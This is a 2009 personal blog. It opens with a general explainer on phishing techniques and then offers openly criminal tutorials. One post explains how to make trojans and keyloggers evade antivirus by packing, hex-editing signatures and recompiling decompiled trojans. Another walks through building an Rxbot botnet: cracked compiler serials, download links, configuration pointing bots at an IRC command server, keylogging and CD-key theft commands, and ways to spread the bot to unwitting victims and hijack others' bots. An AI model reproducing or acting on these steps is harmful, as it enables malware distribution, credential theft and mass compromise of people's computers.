In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites (YouTube, Facebook, MySpace, Windows Live Messenger), auction sites (eBay), online banks (Wells Fargo, Bank of America, Chase), online payment processors (PayPal), or IT Administrators (Yahoo, ISPs, corporate) are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
Common methods used:
Link manipulation-Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".
Filter evasion-Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.
Website forgery-Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
Wan't to learn how t do a simple phishing?
watch this video:http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related
Monday, March 16, 2009
Friday, March 13, 2009
How to make rBot,trojans,keyloggerz and viruses Undetectable
1. Encryptors/Compressors:You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.2. Byte Adders:This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.3. Hex Editing:This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.Step One: Place your Trojan Server in a folder.Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.Step Five: Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.(Optional) Step Six: Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).You have to remember that different AV software use different signatures, so scan with as many as you can.4. Source:The very best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but it could be simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.Option 1: Free Trojan Source Code.Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.Option 2: Decompiling.Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.
Friday, March 6, 2009
How to buil a botnet (revised)
There are many tutorials around but I thought I would post one to help people.In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:Code:http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.htmlCompiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.Q:What is a botnet?A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".Depending on the source you used, the bot can do several things.But once again depending on the source you can :Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".Once again depending on the bot it may be able to kill other fellow competeter bots.Or even kill AV/FW apon startup.Add itself to registry.Open sites.Open commands.Cmd,notepad,html,Anything is possible !Theres the infected computers "bots" the attacker, the server, and the victim.Quote:while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."Botnets are being used for Google Adword click fraud, according to security watchers.Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.---------------Ignore anything about using the server editor but this tutorial show how to make the trojan undetectable and spread bots:Code:http://rapidshare.com/files/206234923/packer_installer.exe.htmlHere we go ladies and gentlemenFollow the tutorial:I. Setting up the C++ compilier: (easy)Download Code:http://www.megaupload.com/?d=SUHPYZRXCode:Pass: itzforblitzSerial: 812-22245582. Run setup.exe and install. Remember to input serial3. Download and install the Service Pack 6 (60.8 mb) Code:http://www.microsoft.com/downloads/d...displaylang=enAfter that Download and install:Windows SDK (1.2 mb) Code:http://www.megaupload.com/?d=YH3SS78IPass: itzforblitzII. Configuring the C++ compilier (easy)1. Open up Microsoft Visual C++ Compilier 6.02. Go to Tools > Options and Click the "Directories" tab3. Now, browse to these directories and add them to the list: (Click the dotted box to add)Quote:C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB4. Now put them in this order: (use up and down arrows)(it does not matter whats below those lines)III. Configuring your bot: (easy)1. Download and unpack:Rxbot 7.6 (212.3 kb) Code:http://rapidshare.com/files/21854222...7.6rx.rar.html2. You should see an Rxbot 7.6 folder3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:Quote:Put in quotations:char password[] = "Bot_login_pass"; // bot password (Ex: monkey)char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)char serverpass[] = ""; // server password (not usually needed)char channel[] = "#botz_channel"; // channel that the bot should joinchar chanpass[] = "My_channel_pass"; // channel passwordOptional:char server2[] = ""; // backup serverchar channel2[] = ""; // backup channelchar chanpass2[] = ""; //Backup channel passIV. Building your bot: (very easy)1. Make sure Microsoft Visual C++ is open2. Select "File > Open Workspace"3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file4. Right Click "rBot Files" and click Build:5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !Command listDownload Command list Code:http://rapidshare.com/files/21542921/cmands.htmlBasics:.login botpassword will login bots.logout will logout bots.keylog on will turn keylogger on.getcdkeys will retrieve cdkeys.Read command list for moreDownload mIRCCode:http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRCHow to secure your bots:Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)and update the channel topic and run:Quote:@update Code:http://www.mybot.com/download/SMSPRO.exe82The Code:http://mybot.comis your bot's download link and the 82 can be any number(s)Now steal their bots and have them join your channelTo find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.To secure your self:It is fairly easy to secure your bots, here is how:1. When you are in your right click on your chat window and select "Channel Modes"2. Make sure these options are checked:This way no one besides you or another op can set the channel topicNote: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
Sunday, March 1, 2009
Welcome to my blog
Im a novice in blogging..pls apologize me for some unnecesary mistakes that i will be making in the future
Subscribe to:
Posts (Atom)